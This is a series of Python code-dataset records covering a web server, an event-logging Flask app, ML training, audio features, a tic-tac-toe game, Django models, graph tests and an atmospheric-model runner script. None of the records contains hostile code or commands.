开始监听HTTP请求:\nhttpd.serve_forever()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"112896499","text":"from phi import *\nres_0 = None\nres_2 = None\nres_1 = None\nres_3 = None\ninsert_bug_0 = None\nis_negative_0 = None\nis_negative_1 = None\nis_negative_2 = None\nn_0 = None\nn_1 = None\nn_2 = None\nn_4 = None\nn_3 = None\nn_5 = None\nn_6 = None\nn_7 = None\nn_8 = None\nn_9 = None\nbase_0 = None\nbase_1 = None\ndigit_0 = None\n\nimport string\nfrom random import random\n\n\ndef int2base_buggy(n, base):\n n_0 = n\n base_0 = base\n res_0 = None\n res_2 = None\n res_1 = None\n res_3 = None\n is_negative_0 = None\n is_negative_1 = None\n is_negative_2 = None\n n_1 = None\n n_2 = None\n n_4 = None\n n_3 = None\n n_5 = None\n digit_0 = None\n\n \"\"\"\n :type n: int\n :type base: int\n :rtype: str\n \"\"\"\n is_negative_0 = False\n variables = dict(globals(), ** locals())\n if n_0 == 0:\n return (variables, '0')\n elif n_0 < 0:\n is_negative_1 = True\n n_1 = n_0*-1\n phiPreds = [n_0 == 0, n_0 < 0]\n phiNames = [is_negative_0, is_negative_1, is_negative_0]\n is_negative_2 = phiIf(phiPreds, phiNames)\n phiPreds = [n_0 == 0, n_0 < 0]\n phiNames = [n_0, n_1, n_0]\n n_2 = phiIf(phiPreds, phiNames)\n digit_0 = string.digits+string.ascii_uppercase\n res_0 = ''\n phi0 = Phi()\n while phi0.phiLoopTest(n_2, n_3) > 0:\n phi0.set()\n res_2 = phi0.phiEntry(res_0, res_1)\n n_4 = phi0.phiEntry(n_2, n_3)\n\n res_1 = res_2+digit_0[n_4 % base_0]\n n_3 = buggy(n_4, base_0)\n res_3 = phi0.phiExit(res_0, res_1)\n n_5 = phi0.phiExit(n_2, n_3)\n variables = dict(globals(), ** locals())\n if is_negative_2:\n return (variables, '-'+res_3[::-1])\n else:\n return (variables, res_3[::-1])\n\n\ndef buggy(n, base):\n n_6 = n\n base_1 = base\n insert_bug_0 = None\n n_7 = None\n n_8 = None\n n_9 = None\n\n insert_bug_0 = random() > .5\n if insert_bug_0:\n n_7 = n_6//base_1-1\n else:\n n_8 = n_6//base_1\n phiPreds = [insert_bug_0]\n phiNames = [n_7, n_8]\n n_9 = phiIf(phiPreds, phiNames)\n return n_9\n\n\n# generate python causal map\ncausal_map = dict(n_2=['n_0', 'n_1', 'n_0'], n_1=['n_0'], is_negative_1=[], n_4=['n_2', 'n_3'], res_3=['res_0', 'res_1'], is_negative_2=['is_negative_0', 'is_negative_1', 'is_negative_0'], n_3=['n_4', 'base_0'], res_1=[\n 'res_2', 'digit_0', 'n_4', 'base_0'], is_negative_0=[], res_2=['res_0', 'res_1'], n_5=['n_2', 'n_3'], digit_0=[], n_8=['n_6', 'base_1'], res_0=[], n_7=['n_6', 'base_1'], n_9=['n_7', 'n_8'], insert_bug_0=[],)\n","sub_path":"int2base_tests/int2base_ssa_buggy.py","file_name":"int2base_ssa_buggy.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"78775098","text":"\nimport os\nimport sys\nimport librosa\nimport time\n\n\ndef create_audio_descriptors(audio_file, sample_rate, dimension, window, hop):\n y, sr = librosa.load(audio_file, sample_rate)\n mfcc = librosa.feature.mfcc(y, sr=sr, n_mfcc=dimension, n_fft=window, hop_length=hop)\n return mfcc.transpose()\n\n\ndef run_process(audio_file, descriptor_file_name, workspace):\n \n \"\"\"\n if len(sys.argv) > 2:\n audio_file = sys.argv[1]\n descriptor_file_name = sys.argv[2]\n \"\"\"\n sample_rate = 22000 # 44100\n descriptors_per_second = 2\n window = int(sample_rate / descriptors_per_second) # 4096\n hop = window # 4096\n dimension = 32\n\n t0 = time.time()\n descriptors = 
create_audio_descriptors(audio_file, sample_rate, dimension, window, hop)\n t1 = time.time()\n\n print(f\"{round(t1 - t0, 2)} seconds\")\n print(descriptors.shape)\n\n descriptor_paths = f\"{workspace}descriptors\"\n\n if not os.path.isdir(descriptor_paths):\n os.mkdir(descriptor_paths)\n \n descriptors_file = f\"{descriptor_file_name}_{descriptors_per_second}_{descriptors.shape[0]}.bin\"\n\n descriptors.tofile(f\"{descriptor_paths}/{descriptors_file}\", sep=\"\\n\")\n print(f\"File: {descriptor_paths}/{descriptors_file}\")\n\n\nif __name__ == \"__main__\":\n\n # python audio_descriptor_generator.py {audio path} {descriptor file name}\n\n if len(sys.argv) > 2:\n run_process() \n","sub_path":"audio_descriptor_generator.py","file_name":"audio_descriptor_generator.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"301279299","text":"import os\n\nlist1 = [[None, None, None], [None, None, None], [None, None, None]]\nchecklist = []\nexitlist = []\nos.system(\"clear\")\ni = 0\nwin = False\nround = 0\n\ndef Numbers(num, char):\n\n if num not in checklist:\n checklist.append(num)\n #\n if num == 1:\n if list1[2][0] == None:\n list1[2][0] = char\n elif num == 2:\n if list1[2][1] == None:\n list1[2][1] = char\n elif num == 3:\n if list1[2][2] == None:\n list1[2][2] = char\n #\n elif num == 4:\n if list1[1][0] == None:\n list1[1][0] = char\n elif num == 5:\n if list1[1][1] == None:\n list1[1][1] = char\n elif num == 6:\n if list1[1][2] == None:\n list1[1][2] = char\n #\n elif num == 7:\n if list1[0][0] == None:\n list1[0][0] = char\n elif num == 8:\n if list1[0][1] == None:\n list1[0][1] = char\n elif num == 9:\n if list1[0][2] == None:\n list1[0][2] = char\n\ndef Print_List():\n count = 0\n game = \"\"\n for i in range(len(list1)):\n row = list1[i]\n for j in range(len(row)):\n num = list1[i][j]\n if count == 3:\n count = 0\n game += \"\\n\"\n count += 1\n if num == None:\n game += \"|_|\"\n else:\n game += \"|\" + num + \"|\"\n print(game)\n\ndef Player1():\n while True:\n p1 = input(\"Player 1: \")\n if p1.isdigit() == True and len(checklist) >= 1 and int(p1) in checklist:\n print(\"You can't place that here.\")\n return Player1()\n elif str(p1).isdigit() == True and int(p1) >= 1 and int(p1) <= 9:\n break\n else:\n print(\"Wrong input!\")\n\n Numbers(int(p1), \"X\")\n os.system(\"clear\")\n Print_List()\n\n if round >= 5:\n Check_Winner(1, \"X\")\n\ndef Player2():\n while True:\n p2 = input(\"Player 2: \")\n if p2.isdigit() == True and len(checklist) >= 1 and int(p2) in checklist:\n print(\"You can't place that here.\")\n return Player2()\n #\n elif str(p2).isdigit() == True and int(p2) >= 1 and int(p2) <= 9:\n break\n else:\n print(\"Wrong input!\")\n\n Numbers(int(p2), \"O\")\n os.system(\"clear\")\n Print_List()\n\n if round >= 5:\n Check_Winner(2, \"O\")\n\n\ndef Win(p):\n print(\"Player\" + str(p) + \"Wins!\")\n\ndef Check_Tie():\n if (None in list1[0]) == False and (None in list1[1]) == False and (None in list1[2]) == False:\n print(\"TIE!\")\n exitlist.append(1)\n\n\ndef Check_Winner(p, char):\n Check_Tie()\n if list1[0][0] == char and list1[0][1] == char and list1[0][2] == char:\n Win(p)\n exitlist.append(1)\n elif list1[1][0] == char and list1[1][1] == char and list1[1][2] == char:\n Win(p)\n exitlist.append(1)\n elif list1[2][0] == char and list1[2][1] == char and list1[2][2] == char:\n Win(p)\n exitlist.append(1)\n #\n elif list1[0][0] == char and list1[1][0] == char and list1[2][0] == 
char:\n        Win(p)\n        exitlist.append(1)\n    elif list1[0][1] == char and list1[1][1] == char and list1[2][1] == char:\n        Win(p)\n        exitlist.append(1)\n    elif list1[0][2] == char and list1[1][2] == char and list1[2][2] == char:\n        Win(p)\n        exitlist.append(1)\n    #\n    elif list1[0][0] == char and list1[1][1] == char and list1[2][2] == char:\n        Win(p)\n        exitlist.append(1)\n    elif list1[0][2] == char and list1[1][1] == char and list1[2][0] == char:\n        Win(p)\n        exitlist.append(1)\n\ndef Game():\n    global round\n    while len(exitlist) == 0:\n        if len(exitlist) == 0:\n            round += 1\n            Player1()\n        else:\n            break\n\n        if len(exitlist) == 0:\n            round += 1\n            Player2()\n        else:\n            break\n\nGame()\n","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"143949061","text":"import os\n\nimport pytreebank\nimport torch\nimport torch.optim as optim\nfrom loguru import logger\nfrom pytorch_transformers import (\n    BertConfig,\n    BertForSequenceClassification,\n    BertTokenizer,\n)\nfrom torch.utils import data\nfrom tqdm import tqdm\n\nos.environ[\"CUDA_LAUNCH_BLOCKING\"] = \"1\"\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nlogger.info(\"Loading the tokenizer\")\ntokenizer = BertTokenizer.from_pretrained(\"bert-large-uncased\")\n\nlogger.info(\"Loading SST\")\nsst = pytreebank.load_sst()\n\n\ndef rpad(array, n=70):\n    \"\"\"Right padding.\"\"\"\n    current_len = len(array)\n    if current_len > n:\n        return array[: n - 1]\n    extra = n - current_len\n    return array + ([0] * extra)\n\n\ndef get_binary_label(label):\n    \"\"\"Convert fine-grained label to binary label.\"\"\"\n    if label < 2:\n        return 0\n    if label > 2:\n        return 1\n    raise ValueError(\"Invalid label\")\n\n\nclass SSTDataset(data.Dataset):\n    def __init__(self, split=\"train\", root=True, binary=True):\n        logger.info(f\"Loading SST {split} set\")\n        self.sst = sst[split]\n\n        logger.info(\"Tokenizing\")\n        if root and binary:\n            self.data = [\n                (\n                    rpad(\n                        tokenizer.encode(\"[CLS] \" + tree.to_lines()[0] + \" [SEP]\"), n=66\n                    ),\n                    get_binary_label(tree.label),\n                )\n                for tree in self.sst\n                if tree.label != 2\n            ]\n        elif root and not binary:\n            self.data = [\n                (\n                    rpad(\n                        tokenizer.encode(\"[CLS] \" + tree.to_lines()[0] + \" [SEP]\"), n=66\n                    ),\n                    tree.label,\n                )\n                for tree in self.sst\n            ]\n        elif not root and not binary:\n            self.data = [\n                (rpad(tokenizer.encode(\"[CLS] \" + line + \" [SEP]\"), n=66), label)\n                for tree in self.sst\n                for label, line in tree.to_labeled_lines()\n            ]\n        else:\n            self.data = [\n                (\n                    rpad(tokenizer.encode(\"[CLS] \" + line + \" [SEP]\"), n=66),\n                    get_binary_label(label),\n                )\n                for tree in self.sst\n                for label, line in tree.to_labeled_lines()\n                if label != 2\n            ]\n\n    def __len__(self):\n        return len(self.data)\n\n    def __getitem__(self, index):\n        X, y = self.data[index]\n        X = torch.tensor(X)\n        return X, y\n\n\ndef train(model, dataset, batch_size=32):\n    generator = torch.utils.data.DataLoader(\n        dataset, batch_size=batch_size, shuffle=True\n    )\n    model.train()\n    train_loss, train_acc = 0.0, 0.0\n    for batch, labels in tqdm(generator):\n        batch, labels = batch.to(device), labels.to(device)\n        optimizer.zero_grad()\n        loss, logits = model(batch, labels=labels)\n        loss.backward()\n        optimizer.step()\n\n        train_loss += loss.item()\n        pred_labels = torch.argmax(logits, axis=1)\n        train_acc += (pred_labels == labels).sum().item()\n    train_loss /= len(dataset)\n    train_acc /= len(dataset)\n    
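# note: the model's loss is a per-batch mean, so dividing the summed batch\n    # losses by len(dataset) gives a scaled average rather than a per-example mean\n    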
return train_loss, train_acc\n\n\ndef evaluate(model, dataset, batch_size=32):\n generator = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, shuffle=True\n )\n # validation\n model.eval()\n loss, acc = 0.0, 0.0\n with torch.no_grad():\n for batch, labels in tqdm(generator):\n batch, labels = batch.to(device), labels.to(device)\n logits = model(batch)[0]\n error = lossfn(logits, labels)\n loss += error.item()\n pred_labels = torch.argmax(logits, axis=1)\n acc += (pred_labels == labels).sum().item()\n loss /= len(dataset)\n acc /= len(dataset)\n return loss, acc\n\n\nif __name__ == \"__main__\":\n trainset = SSTDataset(\"train\", root=False, binary=False)\n devset = SSTDataset(\"dev\", root=False, binary=False)\n testset = SSTDataset(\"test\", root=False, binary=False)\n\n config = BertConfig.from_pretrained(\"bert-large-uncased\")\n config.num_labels = 5\n model = BertForSequenceClassification.from_pretrained(\n \"bert-large-uncased\", config=config\n )\n # model = BertForSequenceClassification.from_pretrained('bert-large-uncased')\n model = model.to(device)\n lossfn = torch.nn.CrossEntropyLoss()\n optimizer = optim.Adam(model.parameters(), lr=1e-5)\n\n for epoch in range(1, 30):\n train_loss, train_acc = train(model, trainset, batch_size=32)\n val_loss, val_acc = evaluate(model, devset, batch_size=32)\n test_loss, test_acc = evaluate(model, testset, batch_size=32)\n logger.info(\n f\"{epoch}, {train_loss:.4f}, {val_loss:.4f}, {test_loss:.4f}, \"\n f\"{train_acc:.3f}, {val_acc:.3f}, {test_acc:.3f}\"\n )\n torch.save(model, f\"bert_large_all_fine_e{epoch}.pickle\")\n\n logger.success(\"Done!\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"191929978","text":"from flask import Flask, request, jsonify\nfrom bson import ObjectId\nimport requests as req\nimport socket \nimport db\nimport time \nimport random\nimport json\n\napp = Flask(__name__)\n\ndbase = db.Db()\n\n# testing ipaddresses \n# ipaddresses = [\n# '12.87.118.0',\n# '64.17.254.216',\n# '65.23.121.221',\n# '67.43.156.0',\n# '67.43.156.64',\n# '78.26.70.208',\n# '81.2.69.160',\n# '82.99.17.96',\n# '83.206.36.224',\n# '85.88.2.224',\n# '89.160.20.112',\n# '142.217.214.0',\n# '222.230.136.0'\n# ]\n\n\nERROR_REQ_FORMAT = 'Please check your data request format.\\n'\nERROR_REQ_FORMAT += ' city=[cityname]&st=[starttime]&et=[endtime]\\n'\nERROR_REQ_FORMAT += ' time format : \\\"%Y-%m-%d:%H.%M.%S\\\" \\n'\nERROR_REQ_FORMAT += ' for example : curl \\'http://ec2-34-201-52-248.compute-1.amazonaws.com:5000?city=Stockholm&st=2019-1-17:09.01.00&et=2019-1-17:09.02.30\\'\\n'\n\n\ndef getlocation(geoservice=None, ipaddress=None):\n '''fetch the remote host location\n '''\n url='http://'+geoservice+':8080/info?ip='+ipaddress\n r = req.get(url)\n jsonstr=r.text\n locdict = json.loads(jsonstr)\n\n if r.status_code == 429:\n timetosleep = float(locdict['period_remaining'])\n time.sleep(timetosleep)\n getlocation(geoservice, ipaddress)\n\n\n result=str()\n try:\n result=locdict['city']\n except:\n result='N/A'\n\n return result\n\ndef gethostname(ipaddress=None):\n '''use the socket to try and get the remote hostname\n '''\n try: \n host_name = socket.gethostbyaddr(ipaddress) \n except: \n host_name = 'n/a'\n\n return host_name[0]\n\n@app.route('/findevent', methods=['GET'])\ndef findevent():\n '''create a query for city & timerange \n '''\n result=str()\n if request.method == 'GET':\n if 'city' in 
request.args and 'st' in request.args and 'et' in request.args:\n cityname = str(request.args.get('city')).upper()\n time_start=request.args.get('st')\n time_end=request.args.get('et')\n else:\n return 'Bad Request', 400\n\n data = dbase.get(cityname, time_start, time_end)\n\n if data[:10]=='ValueError':\n result = 'Bad Request', 400\n\n elif data[:10]=='queryError':\n result = 'Not Found', 404\n\n else:\n result = data, 200\n\n\n else:\n\n result = 'Bad Request', 400\n\n\n return result\n\n\n@app.route('/event', methods=['POST'])\ndef event():\n '''write the JSON paylaod to the db \n '''\n\n geoservice = 'geoipapi'\n # geoservice = '127.0.0.1' # DEBUG \n\n try:\n jsonpayload = request.get_json(force=True)\n\n except:\n return 'input data has to be in JSON-format', 400\n\n remoteaddr = request.remote_addr\n # remoteaddr = ipaddresses[random.randint(0,len(ipaddresses)-1)] # DEBUG\n remotehost = gethostname(remoteaddr)\n\n if len(remotehost)<3:\n remotehost='N/A'\n \n result = '', 400\n \n location=getlocation(geoservice, remoteaddr)\n \n if len(location)<4 or location=='N/A':\n result ='JSON payload saved but cannot fetch the location for this ip : {}'.format(remoteaddr), 200\n \n written = dbase.set(remoteaddr, remotehost, location, jsonpayload)\n \n if written:\n result = 'Ok', 200\n \n return result\n\n \n\n\n\n@app.route('/')\ndef index():\n return 'you\\'ve reached my events application!'\n\n\nif __name__ == '__main__':\n app.run(debug=False,host='0.0.0.0')\n","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"641933786","text":"# -*- encoding: utf-8 -*-\nfrom django.db import models\n\nclass Country(models.Model):\n name = models.CharField('Название',\n max_length=150,\n )\n\n show = models.BooleanField('Показывать на сайте',\n default=True, )\n\n order = models.IntegerField('Порядок',\n default=0)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Страна'\n verbose_name_plural = 'Страны'\n ordering = ['order', 'name']\n\nclass City(models.Model):\n name = models.CharField('Город',\n max_length=150,\n unique=True,\n )\n slug = models.CharField('Ссылка',\n max_length=150,\n null = True,\n blank = True)\n syn = models.ForeignKey('self',\n blank = True,\n null = True,\n verbose_name = 'Синоним',\n related_name = 'synonyms',\n )\n country = models.ForeignKey(Country,\n related_name = 'cities',\n null=True,\n blank=True)\n\n show = models.BooleanField('Показывать на сайте',\n default = True,)\n order = models.IntegerField('Порядок',\n default = 0)\n added = models.DateTimeField('Добавлен',\n auto_now_add = True)\n changed = models.DateTimeField('Изменен',\n auto_now = True)\n\n def __str__(self):\n return self.name\n\n def save(self):\n if not self.slug:\n self.slug = save_for_url(self.name)\n return super(City, self).save()\n\n def get_absolute_url(self):\n return self.slug\n\n class Meta:\n verbose_name = 'Город'\n verbose_name_plural = 'Города'\n ordering = ['order', 'name']\n\ndef to_translit(str):\n \"\"\"\n Переводит русские буквы в транслит\n \"\"\"\n ar = 
{u'А':'A',u'Б':'B',u'В':'V',u'Г':'G',u'Д':'D',u'Е':'E',u'Ё':'E',u'Ж':'J',u'З':'Z',u'И':'I',u'Й':'Y',u'К':'K',u'Л':'L',u'М':'M',u'Н':'N',u'О':'O',u'П':'P',u'Р':'R',u'С':'S',u'Т':'T',u'У':'U',u'Ф':'F',u'Х':'H',u'Ц':'C',u'Ч':'CH',u'Ш':'SH',u'Щ':'SHCH',u'Ы':'Y',u'Э':'E',u'Ю':'YU',u'Я':'YA',u'а':'a',u'б':'b',u'в':'v',u'г':'g',u'д':'d',u'е':'e',u'ё':'e',u'ж':'j',u'з':'z',u'и':'i',u'й':'y',u'к':'k',u'л':'l',u'м':'m',u'н':'n',u'о':'o',u'п':'p',u'р':'r',u'с':'s',u'т':'t',u'у':'u',u'ф':'f',u'х':'h',u'ц':'c',u'ч':'ch',u'ш':'sh',u'щ':'shch',u'ы':'y',u'э':'e',u'ю':'yu',u'я':'ya',u'Ъ':'',u'ъ':'',u'Ь':'',u'ь':''}\n translitstr = ''\n for l in u'%s'%str:\n try:\n translitstr = translitstr + ar[l]\n except KeyError:\n translitstr = translitstr + l\n return translitstr\n\ndef save_for_url(str):\n \"\"\"\n В полученой строке срезается HTML и все \\W меняются на подчеркивание\n \"\"\"\n import re\n r = re.compile('\\W')\n return re.sub('\\W','_',to_translit(re.sub('<[^>]*?>','',str)))","sub_path":"eventakte/city/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"476074777","text":"def main():\n read = set()\n with open('./program.txt', mode='r') as f:\n for line in f:\n line = line.replace('\\n', '')\n if len(line) < 20:\n continue\n if line in read:\n continue\n for l in read:\n if diff(l, line) < 5:\n print('=============')\n print(l)\n print(line)\n print('=============')\n read.add(line)\n\n\ndef diff(s1, s2):\n count = 0\n if len(s1) < len(s2):\n s1 = s1 + \" \" * (len(s2) - len(s1))\n elif len(s1) > len(s2):\n s2 = s2 + \" \" * (len(s1) - len(s2))\n for i in range(len(s1)):\n if s1[i] != s2[i]:\n count += 1\n return count\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"2015_summer/q5.py","file_name":"q5.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"187557317","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 16 10:42:11 2020\n\n@author: alisha\n\"\"\"\nimport pandas as pd\n\n\ndef mean(data1, data2, ids):\n \n ''' calculate the mean and std of 2 dfs'''\n \n #calculate mean & std of both rounds \n df_concat = pd.concat((data1, data2))\n by_row_index = df_concat.groupby(df_concat.index)\n df_means = by_row_index.mean()\n df_means['sub_id']= ids\n df_std = by_row_index.std()\n df_std['sub_id']= ids\n \n return df_means, df_std\n \n \ndef mean_diff(sep_1_imm, sep_1_del, sep_2_imm, sep_2_del):\n \n ids = sep_1_del.loc[:,'sub_id']\n \n #calculate difference between immediate and delayed answers\n diff1 = sep_1_del - sep_1_imm\n diff2 = sep_2_del - sep_2_imm\n #add ids\n diff1['sub_id'] = ids\n diff2['sub_id'] = ids\n \n #calculate mean and std of diff1 and diff2\n df_diff_mean, df_diff_std = mean(diff1,diff2, ids)\n \n #calculate mean of immediate and delayed responses\n df_imm_mean, df_imm_std = mean(sep_1_imm,sep_2_imm, ids)\n df_del_mean, df_del_std = mean(sep_1_del,sep_2_del, ids)\n \n \n return df_diff_mean, df_diff_std, df_imm_mean, df_imm_std, df_del_mean, df_del_std, diff1, diff2","sub_path":"rr_mean_diff.py","file_name":"rr_mean_diff.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"165407406","text":"import unittest\nimport context\nimport os\n\nfrom pyrview.config import Config\n\npath = 
os.path.dirname(os.path.realpath(__file__));\n\nclass LoadConfig(unittest.TestCase):\n\n def setUp(self):\n self.config = Config(path + \"/etc/config.yaml\")\n self.document = self.config.document\n\n def test_document(self):\n self.assertTrue(self.document)\n self.assertIsInstance(self.document, dict, \"document is dict type\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"123878649","text":"from meu_grafo import MeuGrafo\n\nparaiba = MeuGrafo(['J', 'C', 'E', 'P', 'M', 'T', 'Z'])\nparaiba.adicionaAresta('a1', 'J', 'C')\nparaiba.adicionaAresta('a2', 'C', 'E')\nparaiba.adicionaAresta('a3', 'C', 'E')\nparaiba.adicionaAresta('a4', 'P', 'C')\nparaiba.adicionaAresta('a5', 'P', 'C')\nparaiba.adicionaAresta('a6', 'M', 'C')\nparaiba.adicionaAresta('a7', 'T', 'C')\nparaiba.adicionaAresta('a8', 'M', 'T')\nparaiba.adicionaAresta('a9', 'T', 'Z')\ndef separador():\n print(\"-\"*159)\n\nprint(\"\\nNós...\", paraiba.N)\nseparador()\n\nprint(\"Arestas...\")\nfor a in paraiba.A:\n print(paraiba.A[a])\nseparador()\n\nif paraiba.ha_laco():\n print(\"Há laços no grafo\")\nelse:\n print(\"Não há laços nesse grafo\")\nseparador()\n\nif paraiba.ha_paralelas():\n print(\"Há retas paralelas\")\nelse:\n print(\"Não há retas paralelas\")\nseparador()\n\nfor n in paraiba.N:\n print(f\"Grau do vértice {n} -> {paraiba.grau(n)}\")\nseparador()\n\nfor n in paraiba.N:\n print(f\"Arestas sobre o vértice {n}: {paraiba.arestas_sobre_vertice(n)}\")\nseparador()\n\nprint(f\"Lista de vértices não adjacentes: {paraiba.vertices_nao_adjacentes()}\")\nseparador()\n\nif paraiba.eh_completo():\n print(\"O grafo é completo\")\nelse: \n print(\"O grafo não é completo\")\nseparador()\n\nprint(\"BFS no grafo da paraiba (começando no vértice J)\")\nprint(paraiba.BFS(\"J\"))\nseparador()\n\nprint(\"DFS no grafo da paraiba (começando no vértice J)\")\nprint(paraiba.DFS('J'))\nseparador()\n\nif paraiba.ha_ciclo():\n print(f\"Ciclo presente no grafo da paraiba: {paraiba.ha_ciclo()}\")\nelse:\n print(\"Não há ciclo no grafo da paraiba\")\nseparador()\n\nfor c in range(6):\n if paraiba.caminho(c):\n print(f\"Caminho de tamanho {c} no grafo da paraiba: {paraiba.caminho(c)}\")\n else:\n print(f\"Não há um caminho de tamanho {c}\")\nseparador()\n\nif paraiba.conexo():\n print(\"O grafo da paraiba é conexo\")\nelse:\n print(\"O grafo da paraiba não é conexo\")\nseparador()","sub_path":"roteiro_3/teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"218836636","text":"import asyncio\n\nimport aiohttp\n# import aiofiles\n\n# f = aiofiles.open()\n\n#aiofiles.open('filename', mode='r') as f:\n\nfile = open('/home/andrei/Python/sqlalchemy-lab/receipt/catalog.txt', 'r')\n\n# def get_next_file_line():\n# yield from loop.run_in_executor(None, file.readline)\n\nasync def get_next_file_line():\n return await loop.run_in_executor(None, file.readline)\n\nasync def foo():\n print('Running in foo')\n await asyncio.sleep(0)\n print('Explicit context switch to foo again')\n\n\nasync def parse_web_page(url, session):\n l = await get_next_file_line()\n print('parse_web_page', url, l)\n async with session.get(url, timeout=60) as response:\n res = await response.text()\n print('parse_web_page', url, 'got', len(res))\n return 
len(res)\n\n\nasync def fetch_all_urls(session, urls, loop):\n return await asyncio.gather(*[parse_web_page(url, session) for url in urls], return_exceptions=True)\n\n\nurls = [\n 'https://povar.ru/recipes/manty_po-uzbekski-18397.html',\n 'https://povar.ru/recipes/litovskie_ceppeliny-8617.html',\n 'https://povar.ru/recipes/podliv_iz_svininy-7633.html',\n]\n\nloop = asyncio.get_event_loop()\nconnector = aiohttp.TCPConnector(limit=100)\nsession = aiohttp.ClientSession(loop=loop, connector=connector)\nhtmls = loop.run_until_complete(fetch_all_urls(session, urls, loop))\nloop.run_until_complete(session.close())\nloop.close()\nfile.close()\n\nprint(htmls)","sub_path":"asyncio_/simple_read_urls.py","file_name":"simple_read_urls.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"400933373","text":"import subprocess\r\nimport os\r\nimport sys\r\nimport re\r\n\r\nRESULT_DIR = \"atmos_runs_output/\"\r\nLOG_FILE = \"\" #set below\r\nRESULT_FILE = \"\" #set below\r\n\r\nATMOS_DIR = \"../../atmos/\"\r\n\r\nPHOTO_IN = ATMOS_DIR + \"PHOTOCHEM/INPUTFILES/\"\r\nPHOTO_PLANET_INPUT = PHOTO_IN + \"PLANET.dat\"\r\nPHOTO_SPECIES_INPUT = PHOTO_IN + \"species.dat\"\r\nPHOTO_GENERAL_INPUT = PHOTO_IN + \"input_photchem.dat\"\r\nPHOTO_OUTFILE = ATMOS_DIR + \"PHOTOCHEM/OUTPUT/out.out\"\r\n\r\nCLIMA_IO = ATMOS_DIR + \"CLIMA/IO/\"\r\nCLIMA_OUTPUT_FILE = CLIMA_IO + \"clima_allout.tab\"\r\nCLIMA_TEMP_OUT = CLIMA_IO + \"TempOut.dat\"\r\nCLIMA_TEMP_IN = CLIMA_IO + \"TempIn.dat\"\r\n\r\nCH4 = 0\r\nCO2 = 0\r\nSOLCON = 1\r\nINPUT_TEMP_FILE = \"\"\r\nCONTINUE_RUN = False\r\n\r\ndef handleClimaOutput():\r\n \"\"\"\r\n Handle the output from the Clima model file.\r\n \"\"\"\r\n results_file = open(CLIMA_OUTPUT_FILE)\r\n val = \"DIVFrms=\" + os.popen(\"tac %s | grep -m 1 -oP 'NST=.*DIVFrms=\\K.*$'\"%(CLIMA_OUTPUT_FILE)).read()\r\n\r\n #the photochemical model didn't converge, note that in the error file\r\n #and stop\r\n log_file = open(LOG_FILE, \"a+\")\r\n log_file.write(\"Clima had: %s\\n\"%(val))\r\n log_file.close()\r\n\r\n #copy the output file\r\n os.system(\"cp %s %s/clima_allout.tab\"%(CLIMA_OUTPUT_FILE, RESULT_DIR))\r\n\r\n #copy the TempOut file and move it to the TempIn file\r\n os.system(\"cp %s %s/TempOut.dat\"%(CLIMA_TEMP_OUT, RESULT_DIR))\r\n os.system(\"cp %s %s\"%(CLIMA_TEMP_OUT, CLIMA_TEMP_IN))\r\n\r\n temp = float(re.search(\"T\\(ND\\)=([\\d].[\\d]+E[+-][\\d]+)\", val).group(1))\r\n return temp\r\n\r\n\r\ndef handlePhotoOutput():\r\n \"\"\"\r\n Read the out.out file from the PhotoChem model and check the EMAX term\r\n \"\"\"\r\n\r\n results_file = open(PHOTO_OUTFILE)\r\n val = os.popen(\"tac %s | grep -m 1 -oP 'EMAX = \\K[0-9.+-E]+'\"%(PHOTO_OUTFILE)).read()\r\n emax = float(val)\r\n\r\n #the photochemical model didn't converge, note that in the error file\r\n #and stop\r\n log_file = open(LOG_FILE, \"a+\")\r\n log_file.write(\"PhotoChem had EMAX = %2.2e\\n\"%(emax))\r\n log_file.close()\r\n\r\n #copy the output file\r\n os.system(\"cp %s %s/out.out\"%(PHOTO_OUTFILE, RESULT_DIR))\r\n\r\n if emax > 1.0E-10:\r\n #something went wrong, exit\r\n print(\"PhotoChem Failed to converge. 
